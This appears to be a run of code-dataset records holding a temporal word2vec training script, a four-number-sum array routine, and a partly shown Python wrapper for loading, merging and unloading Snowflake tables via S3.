plt.close()\n # plt.show()\n\n def get_sim_between_year(self,target,words= None,years = [i for i in range(1940,2020,1)], word2id= None,name = \"nuclear\"):\n name += \"-\"+target+\"_\".join(words)\n sims = []\n words.append(target)\n \n for year in years:\n embeddings = self.get_embedding_in_a_year(words,year)\n sim = cosine_similarity(embeddings[-1][np.newaxis,:],embeddings[:-1]).squeeze()\n # print(sim.shape)\n sims.append(sim)\n sims = np.array(sims)\n plt.figure(figsize = (10,10))\n for i in range(len(sims[0])):\n plt.plot(years,sims[:,i],label = words[i])\n plt.legend(loc='upper left')\n if platform == \"darwin_none\":\n plt.show()\n else:\n plt.savefig(\"{}.pdf\".format(name),bbox_inches = \"tight\",pad_inches=0)\n plt.close()\n \n\n\n def check_ssd(self,helper):\n\n from scipy.spatial.distance import cosine # cosine distance\n\n words = helper.words\n time_stamped_embeddings = []\n for timespan in helper.timespans:\n all_embeddings = [self.get_embedding_in_a_year(words, year) for year in timespan ]\n mean_embedding = np.mean(np.array(all_embeddings),0)\n time_stamped_embeddings.append(mean_embedding)\n assert len(time_stamped_embeddings) ==2 , \"more timespans than two\"\n scores = [cosine(time_stamped_embeddings[0][i],time_stamped_embeddings[1][i]) for i,word in enumerate(words)]\n print(scores)\n print(helper.evaluate(scores))\n\n\n\n\n\n\n\n\n\n def get_embedding_in_a_year(self,words= None, year = 0,word2id=None):\n if word2id is None:\n word2id = {value:key for key,value in self.id2word.items()}\n\n words_id = [word2id[word]for word in words]\n # print(\"___\"*20)\n \n word,time = torch.LongTensor(words_id),torch.LongTensor([year]*len(words_id))\n # print(time)\n # print(word)\n embeddings = self.skip_gram_model.forward_embedding(word,time).data.numpy()\n return embeddings\n\ndef load_model(model,filename = \"pytorch.bin\"):\n\n 
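# read the saved checkpoint from disk; the helper below mirrors PyTorch's recursive state-dict loading\n    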
state_dict = torch.load(filename)\n    missing_keys, unexpected_keys, error_msgs = [], [], []\n    prefix = \"\"\n    metadata = getattr(state_dict, \"_metadata\", None)\n    state_dict = state_dict.copy()\n    if metadata is not None:\n        state_dict._metadata = metadata\n\n    def load(module, prefix=''):\n        local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})\n        module._load_from_state_dict(state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)\n        for name, child in module._modules.items():\n            if child is not None:\n                load(child, prefix + name + \".\")\n    start_prefix = \"\"\n    load(model, prefix=start_prefix)\n\n    if len(missing_keys) > 0:\n        print(\"weights of {} not initialized from pretrained model: {}\".format(model.__class__.__name__, missing_keys))\n    if len(unexpected_keys) > 0:\n        print(\"weights of {} not used in pretrained model: {}\".format(model.__class__.__name__, unexpected_keys))\n    if len(error_msgs) > 0:\n        print(\"errors in loading state_dict for {} : \\n{}\".format(model.__class__.__name__, error_msgs))\n    return model\n\n\nclass Word2VecTrainer:\n    def __init__(self, args):# input_file, output_file, emb_dimension=100, batch_size=32, window_size=5, iterations=3,initial_lr=0.01, min_count=25,weight_decay = 0, time_scale =1\n\n        # self.data = DataReader(args.text, args.min_count)\n        # if not args.use_time:\n        #     dataset = Word2vecDataset(self.data, args.window_size)\n        # else:\n        #     dataset = TimestampledWord2vecDataset(self.data, args.window_size,args.time_scale)\n        #\n        # self.dataloader = DataLoader(dataset, batch_size=args.batch_size,\n        #                              shuffle=True, num_workers=0, collate_fn=dataset.collate)\n        self.data,self.dataloader = self.load_train(args) # self.data\n\n        if \"train\" in args.text:\n            test_filename = args.text.replace(\"train\",\"test\")\n            if os.path.exists(test_filename):\n                print(\"load test dataset: {}\".format(test_filename))\n                self.test = self.load_train(args, data = self.data, filename=test_filename, is_train=False )\n            else:\n                self.test = None\n\n            dev_filename = args.text.replace(\"train\", \"dev\")\n            if os.path.exists(dev_filename):\n                print(\"load dev dataset: {}\".format(dev_filename))\n                self.dev = self.load_train(args, data = self.data, filename=dev_filename, is_train=False)\n            else:\n                self.dev = None\n        else:\n            self.dev, self.test = None, None\n\n\n        if args.use_time:\n            self.output_file_name = \"{}/{}\".format(args.output, args.time_type)\n            if args.add_phase_shift:\n                self.output_file_name += \"_shift\"\n        else:\n            self.output_file_name = \"{}/{}\".format(args.output, \"word2vec\")\n        if not os.path.exists(args.output):\n            os.mkdir(args.output)\n        if not os.path.exists(self.output_file_name):\n            os.mkdir(self.output_file_name)\n        self.emb_size = len(self.data.word2id)\n        self.emb_dimension = args.emb_dimension\n        self.batch_size = args.batch_size\n        self.iterations = args.iterations\n        self.lr = args.lr\n        self.time_type = args.time_type\n        self.weight_decay = args.weight_decay\n\n        print(args)\n\n\n        if args.use_time:\n            self.skip_gram_model = TimestampedSkipGramModel(self.emb_size, self.emb_dimension,time_type = args.time_type,add_phase_shift=args.add_phase_shift) \n        else:\n            self.skip_gram_model = SkipGramModel(self.emb_size, self.emb_dimension)\n\n        self.use_cuda = torch.cuda.is_available()\n        self.device = torch.device(\"cuda\" if self.use_cuda else \"cpu\")\n        if self.use_cuda:\n            print(\"using cuda and GPU ....\")\n            self.skip_gram_model.cuda()\n\n        # load_path = 
\"{}/{}\".format(self.output_file_name)\n # torch.save(self.skip_gram_model,\"pytorch.bin\")\n # self.skip_gram_model = torch.load(\"pytorch.bin\")\n # self.skip_gram_model = load_model(self.skip_gram_model,\"pytorch.bin\")\n # exit()\n if not args.from_scatch and os.path.exists(self.output_file_name):\n\n print(\"loading parameters ....\")\n self.skip_gram_model.load_embeddings(self.data.id2word,self.output_file_name)\n\n def load_train(self,args,data= None, filename = None, is_train = True):\n if data is None:\n assert is_train==True, \"wrong to load data 1\"\n data = DataReader(args.text, args.min_count)\n filename = args.text\n else:\n assert is_train == False, \"wrong to load test data 2\"\n assert filename is not None, \"wrong to load test data 3\"\n assert data is not None, \"wrong to load test data 4\"\n if not args.use_time:\n dataset = Word2vecDataset(data, input_text = filename, window_size= args.window_size)\n else:\n dataset = TimestampledWord2vecDataset(data,input_text = filename, window_size= args.window_size, time_scale=args.time_scale)\n\n dataloader = DataLoader(dataset, batch_size=args.batch_size,\n shuffle=is_train, num_workers=0, collate_fn=dataset.collate) # shuffle if it is train\n if is_train:\n return data,dataloader\n else:\n return dataloader\n\n def evaluation_loss(self,logger =None):\n results = []\n self.skip_gram_model.eval()\n print(\"evaluating ...\")\n for index,dataloader in enumerate([self.dev,self.test]):\n if dataloader is None:\n continue\n losses = []\n for i, sample_batched in enumerate(tqdm(dataloader)):\n if len(sample_batched[0]) > 1:\n\n pos_u = sample_batched[0].to(self.device)\n pos_v = sample_batched[1].to(self.device)\n neg_v = sample_batched[2].to(self.device)\n\n if args.use_time:\n time = sample_batched[3].to(self.device)\n # print(time)\n loss, pos, neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v, time)\n else:\n\n loss, pos, neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v)\n # print(loss)\n losses.append(loss.item())\n mean_result = np.array(losses).mean()\n results.append(mean_result)\n print(\"test{} loss is {}\".format(index, mean_result))\n logger.write(\"Loss in test{}: {} \\n\".format( index, str(mean_result)))\n logger.flush()\n\n self.skip_gram_model.train()\n return results\n\n def train(self):\n print(os.path.join(self.output_file_name,\"log.txt\"))\n if not os.path.exists(self.output_file_name):\n os.mkdir(self.output_file_name)\n optimizer = optim.Adam(self.skip_gram_model.parameters(), lr=self.lr, weight_decay=self.weight_decay)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, len(self.dataloader)*self.iterations)\n\n\n with open(\"{}/log.txt\".format(self.output_file_name,\"log.txt\"),\"w\") as f:\n for iteration in range(self.iterations):\n\n print(\"\\nIteration: \" + str(iteration + 1))\n f.write(str(args) +\"\\n\")\n # optimizer = optim.SparseAdam(self.skip_gram_model.parameters(), lr=self.initial_lr)\n\n\n running_loss = 0.0\n for i, sample_batched in enumerate(tqdm(self.dataloader)):\n if len(sample_batched[0]) > 1:\n\n pos_u = sample_batched[0].to(self.device)\n pos_v = sample_batched[1].to(self.device)\n neg_v = sample_batched[2].to(self.device)\n\n optimizer.zero_grad()\n if args.use_time:\n time = sample_batched[3].to(self.device)\n # print(time)\n loss,pos,neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v,time)\n else:\n\n loss,pos,neg = self.skip_gram_model.forward(pos_u, pos_v, neg_v)\n # print(loss)\n\n loss.backward()\n optimizer.step()\n scheduler.step()\n\n\n\n 
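# .item() converts the result tensors to plain Python floats for logging\n                        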
loss,pos,neg = loss.item(),pos.item(),neg.item()\n\n if i % args.log_step == 0: # i > 0 and\n f.write(\"Loss in {} steps: {} {}, {}\\n\".format(i,str(loss),str(pos),str(neg)))\n\n if not torch.cuda.is_available() or i % (args.log_step*10) == 0 :\n print(\"Loss in {} steps: {} {}, {}\\n\".format(i,str(loss),str(pos),str(neg)))\n self.evaluation_loss(logger=f)\n epoch_path = os.path.join(self.output_file_name,str(iteration))\n if not os.path.exists(epoch_path):\n os.mkdir(epoch_path)\n\n torch.save(self.skip_gram_model, os.path.join( epoch_path,\"pytorch.bin\") )\n\n self.skip_gram_model.save_embedding(self.data.id2word, os.path.join(self.output_file_name,str(iteration)))\n self.skip_gram_model.save_in_text_format(self.data.id2word,\n os.path.join(self.output_file_name, str(iteration)))\n self.skip_gram_model.save_in_text_format(self.data.id2word,self.output_file_name)\n\n\n torch.save(self.skip_gram_model, os.path.join(self.output_file_name,\"pytorch.bin\") )\n with open(os.path.join(self.output_file_name,\"config.json\"), \"wt\") as f:\n json.dump(vars(args), f, indent=4)\n self.skip_gram_model.save_dict(self.data.id2word,self.output_file_name)\n\n\n\ndef get_sim_words(checker, words, years,real_years, k = 100 ):\n simwords = []\n for year in years:\n simwords.append(checker.get_similar_words(words = words, year = year, k = k))\n\n # base_year = 1810 if \"coha\" in checker.path else 1990\n # real_years = [str(year + base_year) for year in years]\n #\n # if \"arxiv\" in checker.path:\n # real_years = [\"{}-{}\".format( (year-4)//12 +2007, (year-4)%12 ) for year in years]\n\n lines = [\"{} \".format(checker.path)]\n for row in range(len(simwords[0])):\n line = [real_years[i] + \" : \" + simword[row] for i,simword in enumerate(simwords)]\n print(line)\n print(\"--\"*20)\n lines.extend(line)\n return \"\\n\".join(lines)\n\n\ncheck_list = [ (\"president\", [ \"nixon\",\"ford\",\"carter\", \"reagan\",\"clinton\", \"bush\" , \"obama\", \"trump\", \"biden\"]),\n (\"olympic\", [ \"moscow\", \"los\", \"angeles\", \"seoul\", \"barcelona\",\"atlanta\",\"sydney\",\"athens\", \"beijing\", \"london\", \"rio\", \"tokyo\"]),\n (\"nuclear\", [ \"technology\",\"threaten\",\"america\", \"russian\",\"cuba\", \"green\" , \"energy\",\"china\"]),\n (\"nuclear\", [ \"russian\",\"japan\", \"weapon\" , \"energy\", \"ukrainian\", \"soviet\"]),\n (\"olympic\", [\"sydney\",\"athens\", \"beijing\", \"london\", \"rio\", \"tokyo\"]),\n (\"president\", [ \"clinton\", \"bush\" , \"obama\", \"trump\", \"biden\"]),\n]\n\n\n\ncoha_words = [\"apple\", \"amazon\" , \"dna\", \"innovation\" , \"data\" , \"app\", \"twitter\", \"ranking\",\"quantum\", \"nuclear\",\"weapon\", \"president\" , \"chairman\" ,\"soviet\", \"reagan\", \"trump\", \"biden\", \"obama\", \"olympic\", \"olympics\", \"china\",\"america\",\"ai\", \"artificial\", \"intelligence\", \"neural\", \"network\", \"language\", \"model\",\"information\", \"retrieval\"]\nwords = coha_words + [\"iphone\", \"mp3\"]\n\ndef draw_figure():\n for output in [\"coha.txt.raw.token-output/\", \"coca.txt.raw.token-output/\", \"arxiv.txt.raw.token-output/\"]:\n if \"coca\" in output:\n years = [i-1990 for i in range(1990, 2020, 1)]\n else:\n years = [i-1810 for i in range(1810, 2020, 1)]\n for time_type in [\"word_mixed_fixed\", \"word_cos\"]: # \"word_cos\",\n for epoch in range(1,10,1):\n args.iterations = epoch\n try:\n checker = Word2VecChecker(path=output, time_type=time_type)\n for target, checked_words in check_list:\n # checker.plot_words_in_many_years(words=[target] + 
checked_words[-9:], years=years,\n # name=\"{}-{}\".format(output.split(\".\")[0], time_type))\n checker.get_sim_between_year(target, checked_words[-9:],\n name=\"{}-{}-{}-\".format(output.split(\".\")[0], time_type,epoch), years=years)\n except Exception as e:\n print(e)\n\n\ntimetypes = [\"cos\" , \"linear_shift\", \" mixed_shift\", \"sin_shift\", \"word_cos\", \"word_linear_shift\", \"word_mixed_fixed\", \"word_mixed_shift\", \"word_sin_shift\",\n\"cos_shift mixed\", \"others_shift\", \"word2vec\", \"word_cos_shift\", \"word_mixed\", \"word_mixed_fixed_shift\", \"word_sin\"]\n\n\ndef check_ssd():\n from data.ssd import Helper\n\n helper = Helper(\"data/grade.txt\")\n for time_type in timetypes: # [ \"word_sin\" ,\"word_cos\", \"word_cos_shift\", \"word_cos_shift\" ,\"word_mixed_fixed\",\"cos\",\"cos_shift\",\"\"]: #\n for epoch in range(10):\n try:\n print(time_type, epoch, \"-\" * 20 + \"\\n\")\n args.iterations = epoch\n checker = Word2VecChecker(path=\"coha.txt.raw.token-output/\", time_type=time_type)\n checker.check_ssd(helper)\n except Exception as e:\n print(e)\n\ndef sim_words_over_time(model_path,words,epoches = 10,dataset=\"none\",years =()):\n\n years, real_years = years\n\n for time_type in [\"word_mixed_fixed\"]: # \"word_cos\", , \"word_cos\"\n epoches = 10 if \"mixed_fixed\" in time_type else 5\n\n for epoch in range(1,epoches,1):\n save_filename = \"{}-{}-{}-sim_word_log.txt\".format(dataset, epoch, time_type)\n print(\"save log in {}\".format(save_filename))\n with open(save_filename, \"w\", encoding=\"utf-8\") as f:\n args.iterations = epoch\n checker = Word2VecChecker(path=model_path, time_type=time_type)\n log_text = get_sim_words(checker, words, years,real_years)\n print(log_text)\n\n f.write(log_text + \"\\n\")\n # exit()\n\n\n\nwords = [\"dna\", \"innovazione\", \"invecchiamento\", \"anziano\", \"vaccino\", \"spaziale\", \"coronavirus\", \"pandemia\",\"mascherina\", \"vaccino\", \"test\", \"respiratore\"]\n\n\nif __name__ == '__main__':\n \n if args.do_eval:\n # draw_figure()\n for model_path,(years, real_years) in year_mapping.items():\n sim_words_over_time(model_path,words, dataset=model_path.split(\"-\")[0], years=(years, real_years))\n # if \"coha\" in model_path:\n # sim_words_over_time(model_path,coha_words,dataset = model_path.split(\"-\")[0], years =(years, real_years) )\n # else:\n # sim_words_over_time(model_path,words,dataset = model_path.split(\"-\")[0],years =(years, real_years))\n # checker.word_change_rate(words, years =args.years)\n else:\n w2v = Word2VecTrainer(args)\n #input_file = args.text, output_file = args.output, batch_size = args.batch_size, initial_lr = args.lr, weight_decay = args.weight_decay, iterations = args.iterations, time_scale = args.time_scale\n w2v.train()\n\n # embeddings = checker.get_embedding_in_a_year(words = \"network\", year =1990)\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":27898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334526932","text":"#Sample Input : [7,6,4,-1,1,2],16\n#Sample Output : [[7,6,4,-1],[7,6,1,2]]\n\n#AverageTime : O(N^2) and Space : O(N^2)\n\n#fourNumberSum Function will return a 2d-array of quadruplets that sum up to a given target value \ndef fourNumberSum(array, targetSum):\n\tpairSums = {}\n\tquadruplets = []\n\t\n\tfor i in range(1,len(array)-1):\n\t\t\n\t\tfor j in range(i+1,len(array)):\n\t\t\tcurrentSum = array[i] + array[j]\n\t\t\tdiff = targetSum - currentSum\n\t\t\tif diff in 
pairSums:\n\t\t\t\tfor pair in pairSums[diff]:\n\t\t\t\t quadruplets.append(pair + [array[i], array[j]])\n\t\t\t\t\t\n\t\tfor k in range(0,i):\n\t\t\tcurrentSum = array[k] + array[i]\n\t\t\tif currentSum not in pairSums:\n\t\t\t\tpairSums[currentSum] = [[array[k],array[i]]]\n\t\t\telse:\n\t\t\t\tpairSums[currentSum].append([array[k],array[i]])\n\treturn quadruplets\n\nif __name__ == '__main__':\n targetValue = int(input())\n arr = list(map(int,input().split()))\n result = fourNumberSum(arr, targetValue)\n for pair in result:\n \tprint(pair)","sub_path":"Arrays/fourNumberSum.py","file_name":"fourNumberSum.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"427072779","text":"from __future__ import print_function\nimport sys\nimport pandas as pd\nimport snowflake.connector\nfrom bi_db.bi_exceptions import SnowflakeException\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\nfrom snowflake.sqlalchemy import URL\nfrom datetime import datetime\nfrom bi_tools import flex_read\nfrom bi_tools import flex_write\n\nfrom s3_buckets import S3Buckets\ns3_snowflake = S3Buckets().snowflake\nfrom biz_intel_creds import CredsList\nsnowflake_creds = CredsList().snowflake\n\nclass SnowflakeConnection(object):\n def __init__(self):\n \"\"\"Snowflake Database Connection. Wrapper library designed and built\n to help users run database operations on Snowflake more easily.\n\n Args:\n NA\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n self.connection = snowflake.connector.connect(\n user=snowflake_creds['USER'],\n password=snowflake_creds['PASSWORD'],\n account=snowflake_creds['ACCOUNT'],\n role=\"ACCOUNTADMIN\"\n )\n self.engine = self.connection.cursor()\n\n def write_to_sql(self, df, schema_name, table_name,\n db_name=s3_snowflake[\"database_name\"],**kwargs):\n \"\"\"Writes records stored in a DataFrame to Snowflake database.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n kwargs: [\"if_exists\"]\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n # check to see if `if_exists` key argument was passed in\n try:\n kwargs[\"if_exists\"]\n if kwargs[\"if_exists\"] not in [\"fail\", \"replace\", \"append\"]:\n raise SnowflakeException(\"`if_exists` should be one of\"\\\n \"[`fail`, `replace`, `append`]\")\n else:\n if_exists = kwargs[\"if_exists\"]\n except NameError:\n if_exists = \"append\"\n except KeyError:\n if_exists = \"append\"\n\n custom_engine = self._create_custom_engine(db_name, schema_name)\n df = self._format_for_load(df)\n capitalize_columns_dict = {i: i.upper() for i in df.columns.tolist()}\n df = df.rename(columns=capitalize_columns_dict)\n df.to_sql(name=table_name, con=custom_engine, if_exists=if_exists,\n index=False, chunksize=1000)\n\n def load(self, schema_name, table_name,\n filepath, format , db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Loads s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n bucket = self._get_bucket(filepath)\n if format.upper() == \"CSV\":\n format = \"comma_delimited\"\n elif format.upper() == \"JSON\":\n raise SnowflakeException(\"format not supported\")\n elif format.upper() == \"GZIP\":\n raise 
SnowflakeException(\"format not supported\")\n else:\n raise SnowflakeException(\"format not supported\")\n\n bucket_name = bucket[\"bucket_name\"]\n\n if \".gz\" in filepath:\n gz_df = flex_read(filepath, s3=True, bucket_name=bucket_name)\n import random\n random_num = random.randint(1,101)\n filepath = \"{prefix}/tempfile/tempfile_{num}\".format(\n prefix=s3_snowflake[\"prefix\"], num=random_num)\n flex_write(gz_df, filepath, s3=True)\n\n load_query = \"\"\"\n COPY INTO {schema}.{table} FROM {filepath}\n FILE_FORMAT = (FORMAT_NAME='{format}')\n ON_ERROR = CONTINUE\n force=true;\n \"\"\".format(schema=schema_name,\n table=table_name,\n filepath=filepath.replace(bucket[\"prefix\"],\n bucket[\"stage\"]),\n format=format)\n if self._table_exists(table_name, schema_name, db_name):\n self.query_executor(\"USE SCHEMA {}.{}\".format(db_name, \"PUBLIC\"))\n self.query_executor(load_query)\n self.query_executor(\"COMMIT\")\n else:\n df = flex_read(filepath, s3=True,\n bucket_name=bucket[\"bucket_name\"], nrows=500)\n self.engine.execute(\"USE SCHEMA {db_name}.{schema}\".format(\n db_name=db_name,\n schema=schema_name\n )\n )\n self.write_to_sql(df=df, db_name=db_name,\n schema_name=schema_name, table_name=table_name,\n if_exists=\"replace\"\n )\n self.query_executor(\"USE SCHEMA {}.{}\".format(\n db_name, schema_name\n )\n )\n self.query_executor(\"DELETE FROM {}\".format(table_name))\n self.query_executor(\"USE SCHEMA {}.{}\".format(db_name, \"PUBLIC\"))\n self.query_executor(load_query)\n self.query_executor(\"COMMIT\")\n self._grant_permission(db_name, schema_name)\n\n def append(self, schema_name, table_name,\n filepath, format=\"csv\", db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Bulk appends s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n # default bulk load is bulk append\n self.load(schema_name, table_name,\n filepath, format, db_name)\n\n def update(self, schema_name, table_name, filepath, update_on,\n format=\"comma_delimited\", db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Bulk upserts s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n update_on: name of the column to update on\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n bucket = self._get_bucket(filepath)\n # create staging_{destination_table_name}\n # and upload to staging\n staging_name = \"STAGING_\" + table_name\n df = flex_read(filepath, s3=True,\n bucket_name=bucket[\"bucket_name\"], nrows=5)\n\n column_list = df.columns.tolist()\n update_column_match_string = ', '.join(\n \"{column} = {schema}.{temp_table}.{column}\".format(\n column=i, temp_table=staging_name,\n schema=schema_name) for i in column_list)\n temp_column_string = ', '.join(\n \"{schema}.{temp_table}.{column}\".format(\n column=i, temp_table=staging_name,\n schema=schema_name) for i in column_list)\n prod_column_string = ', '.join(\n \"{column}\".format(\n column=i) for i in column_list)\n self.query_executor(\"USE DATABASE {}\".format(db_name))\n create_temp_table_query = \\\n \"\"\"CREATE TEMPORARY TABLE {schema}.{temp_table}\n LIKE {schema}.{table};\"\"\".format(\n schema=schema_name\n , table=table_name\n , 
temp_table=staging_name)\n load_temp_query = \"\"\"COPY INTO {schema}.{temp_table}({prod_columns})\n FROM {filepath}\n FILE_FORMAT = (FORMAT_NAME='{format_name}'\n ESCAPE_UNENCLOSED_FIELD=NONE);\"\"\".format(\n schema=schema_name\n , temp_table=staging_name\n , prod_columns=prod_column_string\n , filepath=filepath.replace(\n bucket[\"prefix\"],\n bucket[\"stage\"])\n , format_name=format)\n merge_query = \\\n \"\"\"MERGE INTO {schema}.{table}\n USING {schema}.{temp_table}\n ON {schema}.{table}.{update_on} = {schema}.{temp_table}.{update_on}\n WHEN MATCHED THEN UPDATE SET {update_column_match_string}\n WHEN NOT MATCHED THEN INSERT({prod_columns}) VALUES({temp_columns});\"\"\".\\\n format(\n schema=schema_name\n , table=table_name\n , temp_table=staging_name\n , update_on=update_on\n , update_column_match_string=update_column_match_string\n , prod_columns=prod_column_string\n , temp_columns=temp_column_string)\n self.query_executor(\"USE SCHEMA {}.{};\".format(db_name, \"PUBLIC\"))\n self.query_executor(create_temp_table_query)\n self.query_executor(load_temp_query)\n self.query_executor(merge_query)\n\n def replace(self, schema_name, table_name,\n filepath, format=\"csv\", db_name=s3_snowflake[\"database_name\"]):\n \"\"\"Bulk replaces s3 object into Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n filepath: filepath of the s3 object\n\n format: format of the s3 object\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n # write staging\n staging_table_name = table_name.upper() + \"_STAGING\"\n self.query_executor(\"USE SCHEMA {db}.{sn}\".format(\n db=db_name, sn=schema_name\n )\n )\n self.load(schema_name, staging_table_name,\n filepath, format, db_name\n )\n # change table names\n self.query_executor(\"USE SCHEMA {db}.{sn}\".format(\n db=db_name, sn=schema_name\n )\n )\n self.query_executor(\"ALTER TABLE {tn} RENAME TO {gn}\".format(\n tn=table_name, gn=\"garbage\"\n )\n )\n self.query_executor(\"ALTER TABLE {stn} RENAME TO {tn}\".format(\n stn=staging_table_name, tn=table_name\n )\n )\n # drop the old table\n self.query_executor(\"DROP TABLE {gn}\".format(gn=\"garbage\"))\n\n def create(self, object_name, object_type=None, **kwargs):\n \"\"\"Creates a database object.\n\n Args:\n object_name: name of the object you are creating\n\n object_type: (DATABASE, SCHEMA, WAREHOUSE, TABLE)\n\n DATABASE(key argument): name of the database\n\n SCHEMA(key argument): name of the schema\n\n df(key argument): dataframe you want to create the table with\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n if \"DATABASE\" in kwargs:\n db_name = kwargs[\"DATABASE\"]\n if \"SCHEMA\" in kwargs:\n schema_name = kwargs[\"SCHEMA\"]\n\n if object_type is None:\n raise SnowflakeException(\"object type must be one of \"\\\n \"['DATABASE', 'SCHEMA',\" \\\n \"'WAREHOUSE', 'TABLE']\"\n )\n elif object_type.upper() in [\"DATABASE\", \"WAREHOUSE\"]:\n self.engine.execute(\"CREATE {ot} IF NOT EXISTS {on}\".format(\n ot=object_type, on=object_name\n )\n )\n elif object_type.upper() == \"SCHEMA\":\n self.engine.execute(\"USE DATABASE {db_name}\".format(\n db_name=kwargs[\"DATABASE\"]\n )\n )\n self.engine.execute(\"CREATE {ot} IF NOT EXISTS {on}\".format(\n ot=object_type, on=object_name\n )\n )\n self._grant_permission(kwargs[\"DATABASE\"], object_name)\n elif object_type.upper() == \"TABLE\":\n self.engine.execute(\"USE SCHEMA {db_name}.{schema}\".format(\n db_name=kwargs[\"DATABASE\"],\n schema=kwargs[\"SCHEMA\"]\n )\n )\n # 
default append creates the table\n today = datetime.strftime(datetime.today(), \"%Y-%m-%d\")\n savepath = \\\n \"{prefix}/schema={schema}\"\\\n \"/table={table}/{today}/{schema}_{table}.csv\".format(\n prefix=s3_snowflake[\"prefix\"], schema=kwargs[\"SCHEMA\"],\n table=object_name, today=today)\n\n flex_write(kwargs[\"df\"], savepath,s3=True)\n self.append(schema_name=kwargs[\"SCHEMA\"], table_name=object_name,\n filepath=savepath)\n\n def unload(self, database, schema, table, **kwargs):\n \"\"\"Unloads a database table into a specified s3 location\n\n Args:\n database: name of the database\n\n schema_name: name of the schema\n\n table_name: name of the table\n\n s3_path: filepath of the s3 object\n\n kwargs: [\"aws_access_key_id\", \"aws_secret_access_key\"]\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n schema = schema.upper()\n table = table.upper()\n try:\n kwargs[\"s3_path\"]\n s3_path = kwargs[\"s3_path\"]\n except NameError:\n today = datetime.strftime(datetime.today(), \"%Y-%m-%d\")\n s3_path = \"{prefix}/schema={schema}/table={table}/\"\\\n \"{today}\".format(prefix=s3_snowflake[\"prefix\"], schema=schema,\n table=table, today=today)\n except KeyError:\n today = datetime.strftime(datetime.today(), \"%Y-%m-%d\")\n s3_path = \"{prefix}/schema={schema}/table={table}/\"\\\n \"{today}\".format(prefix=s3_snowflake[\"prefix\"], schema=schema,\n table=table, today=today)\n if set([\"aws_access_key_id\", \"aws_secret_access_key\"]) < \\\n set(list(kwargs)):\n aws_key_given = True\n else:\n aws_key_given = False\n if not aws_key_given:\n sql=\"\"\"\n UNLOAD \\\n('select * from {database}.{schema}.{table}') TO '{s3path}/{schema}_{table}' \\\n CREDENTIALS\n 'aws_iam_role=arn:aws:iam::542960883369:role/redshift_access_role' \\\n DELIMITER AS ',' \\\n ADDQUOTES \\\n NULL AS '' \\\n ALLOWOVERWRITE \\\n PARALLEL OFF;\"\"\"\\\n .format(database=database,\n schema=schema,\n table=table,\n s3path=s3_path)\n elif aws_key_given:\n sql=\"\"\"\n UNLOAD \\\n('select * from {database}.{schema}.{table}') TO '{s3path}/{schema}_{table}' \\\n CREDENTIALS\n 'aws_access_key_id={aki};aws_secret_access_key={sck}' \\\n DELIMITER AS ',' \\\n ADDQUOTES \\\n NULL AS '' \\\n ALLOWOVERWRITE \\\n PARALLEL OFF;\"\"\"\\\n .format(database=database,\n schema=schema,\n table=table,\n s3path=s3_path,\n aki=kwargs[\"aws_access_key_id\"],\n sck=kwargs[\"aws_secret_access_key\"])\n #logger.custom_log(\"Unloading your table\")\n self.query_executor(sql)\n\n df = self.sql_dataframe(\"select * from {}.{}.{} limit 3;\".format(\n database, schema, table))\n df = pd.DataFrame(df.columns)\n df.rename(columns={0:\"column_name\"}, inplace=True)\n flex_write(df, s3_path + \"/column_names.csv\", \"csv\", s3=True)\n\n\n def get_metadata(self, db_name, schema_name, table_name):\n \"\"\"Gets and returns the metadata table.\n\n Args:\n database: name of the database\n\n schema: name of the schema\n\n table: name of the table\n Returns:\n metadata: list of metadata of each field\n Raises:\n NA\n \"\"\"\n self.engine.execute(\"SELECT * FROM {}.{}.{} limit 5\"\\\n .format(db_name, schema_name, table_name))\n return ','.join([col[0] for col in self.engine.description])\n\n def get_query_id(self, query_order=-1):\n \"\"\"Gets and returns the query_id.\n\n Args:\n query_order: the order of the query_id being fetched\n Returns:\n query_id: the id the of the query\n Raises:\n SnowflakeException\n \"\"\"\n df = pd.read_sql(sql=\"select last_query_id({ord})\"\\\n .format(ord=query_order),con=self.connection)\n return 
